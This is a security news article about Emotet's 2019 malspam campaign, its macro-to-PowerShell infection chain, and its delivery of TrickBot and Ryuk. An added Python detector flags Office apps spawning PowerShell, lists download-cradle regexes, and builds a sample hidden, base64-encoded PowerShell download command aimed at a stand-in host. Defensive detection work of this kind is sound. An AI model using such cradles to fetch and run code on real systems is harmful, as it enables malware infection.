Emotet is Back in Action and Delivering TrickBot and Ryuk Ransomware

It has been all quiet on the Emotet front for the past four months, but the infamous botnet is back with a vengeance. A large-scale spam campaign has been detected that is distributing the versatile Emotet banking Trojan via malicious Word macros.

The malspam campaign was detected by researchers at Malwarebytes, who identified an uptick in command and control server activity and an email campaign distributing malicious messages in English, German, Italian, and Polish. The campaign commenced on September 16 with emails claiming to be “Payment Remittance Advice”, a common ruse to get users to open malicious Word documents and enable macros to view the contents of the document.

To increase the likelihood of the emails and attachments being opened, the subject lines are personalized and include the recipient’s name, for example “Joe Bloggs Payment Remittance Advice”.

The body of the email claims the attached document is a statement detailing a payment that is due. If the document is opened, the user is asked to click ‘Enable Content’, supposedly to accept a Microsoft license agreement; the lure claims that Word features will otherwise be disabled. Clicking the button does nothing of the sort: it enables macros, which is all the attacker needs.

If content is enabled, the macro runs and launches a PowerShell script which downloads the Emotet Trojan from one of a number of compromised WordPress websites. Once installed, Emotet spreads laterally across the network and infects other devices. It also hijacks the user’s email account and sends further spam to everyone in the user’s contact list, so a single opened attachment can seed infections well beyond the original victim.
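The infection chain above (Word macro spawning PowerShell, which pulls a payload from a compromised web server) is the stage most defenders can catch with process telemetry before Emotet ever lands. The following is an added example, not code from the original article or from Malwarebytes: it scans constructed process-creation records (fields modelled on Sysmon Event ID 1 / EDR telemetry, but the records themselves are made up) and flags Office applications spawning a scripting host with an encoded or download-cradle command line. The process names, regexes and sample URL are assumptions for illustration, not indicators published for this campaign.

```python
"""Detect the macro-to-PowerShell stage of the Emotet chain in process telemetry.

Added example, not the article's or Malwarebytes' code. Event records are
constructed for the example; names and patterns are assumptions.
"""
import base64
import ntpath
import re
from dataclasses import dataclass

# Office applications that should not normally spawn a scripting host (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Common PowerShell download cradles and in-memory execution primitives.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|"
    r"start-bitstransfer|net\.webclient|invoke-expression|\biex\b",
    re.IGNORECASE,
)
# -e, -ec, -enc and -EncodedCommand all take a base64 blob of UTF-16LE script.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return the reasons an event looks like the macro stage; an empty list means nothing matched."""
    parent = ntpath.basename(event.parent_image).lower()
    child = ntpath.basename(event.image).lower()
    reasons = []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {child}")
    decoded = decode_encoded_command(event.command_line)
    # Inspect the decoded script when there is one, otherwise the raw command line.
    script = decoded if decoded is not None else event.command_line
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    if HIDDEN_WINDOW.search(event.command_line):
        reasons.append("hidden window")
    if DOWNLOAD_CRADLE.search(script):
        reasons.append("download cradle")
    for url in URL.findall(script):
        reasons.append(f"url {url}")
    return reasons


def scan(events):
    """Return (index, reasons) for events worth an alert: suspicious lineage or a download cradle."""
    hits = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if any(" spawned " in r for r in reasons) or "download cradle" in reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample telemetry (not real campaign data). The first record mimics the
# chain in the article; the others are benign look-alikes that must not fire.
_STAGE2 = "(New-Object Net.WebClient).DownloadString('http://compromised-site.example/wp-content/uploads/x/')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 f"powershell.exe -w hidden -enc {_ENCODED}"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe Get-ChildItem C:\\Users"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 '"WINWORD.EXE" /n "C:\\Users\\jbloggs\\Downloads\\remittance.doc"'),
]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        print(f"event {index}: " + "; ".join(reasons))
```

Two design points carry over to a real deployment: decode `-EncodedCommand` before pattern matching, because the cradle and the URL are invisible in the raw command line, and alert on the parent/child relationship on its own, since a legitimate Word process has no business launching PowerShell regardless of what the arguments look like.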

The Emotet banking Trojan steals banking credentials, but it also serves as a botnet and malware downloader. The operators of the Emotet botnet are understood to sell access to infected machines to other threat groups, including the group behind Ryuk ransomware. Ryuk was initially linked to the North Korea-based Lazarus Group because it shares code with the Hermes ransomware, but that attribution is no longer widely accepted; Ryuk is now attributed to a Russian-speaking criminal group (tracked by CrowdStrike as Wizard Spider) that also operates TrickBot.

In addition to Ryuk ransomware, Emotet is also being used to distribute the TrickBot Trojan. The three-malware combo has been dubbed the ‘triple threat’: Emotet provides the initial foothold, TrickBot harvests credentials and maps the network, and Ryuk is deployed once the attackers have the access they need to encrypt as much of the environment as possible. The combination has been used in devastating attacks on many businesses, cities, and municipalities, and is believed to have been used to infect Riviera Beach in Florida with Ryuk ransomware. That attack resulted in widespread file encryption which disabled many city services, and Riviera Beach officials agreed to pay a ransom of approximately $600,000 for the keys to unlock the encryption. According to Malwarebytes, the ransomware strain has earned at least $3.8 million in the first six months of 2019.

Author: Richard Anderson

Richard Anderson is the Editor-in-Chief of NetSec.news